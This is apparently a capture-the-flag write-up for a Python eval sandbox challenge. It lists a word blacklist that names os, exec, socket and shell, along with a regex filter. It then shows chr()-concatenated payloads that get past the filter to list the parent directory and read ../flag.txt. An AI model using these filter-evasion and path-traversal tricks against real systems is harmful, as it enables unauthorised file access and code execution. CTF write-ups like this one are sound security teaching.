3v@l

Blacklisted words: os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind

Regex to bypass: r'0x[0-9A-Fa-f]+|\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|.[A-Za-z0-9]{1,3}\b|[\\/]|..'

• 0x[0-9A-Fa-f]+: Hexadecimal numbers prefixed with 0x
• \\u[0-9A-Fa-f]{4} : Unicode escape sequences in the \uXXXX format
• %[0-9A-Fa-f]{2} : URL-encoded characters in the %XX format
• \.[A-Za-z0-9]{1,3}\b : File extensions of 1 to 3 alphanumeric characters preceded by a dot
• [\\\/] : Backslash or forward slash
• \.\. : ..

__import__(chr(111)+chr(115)).listdir('.'+'.')
# os.listdir('..')

open('.'+'.'+chr(47)+'flag.'+'txt').read()
# open(../flag.txt).read()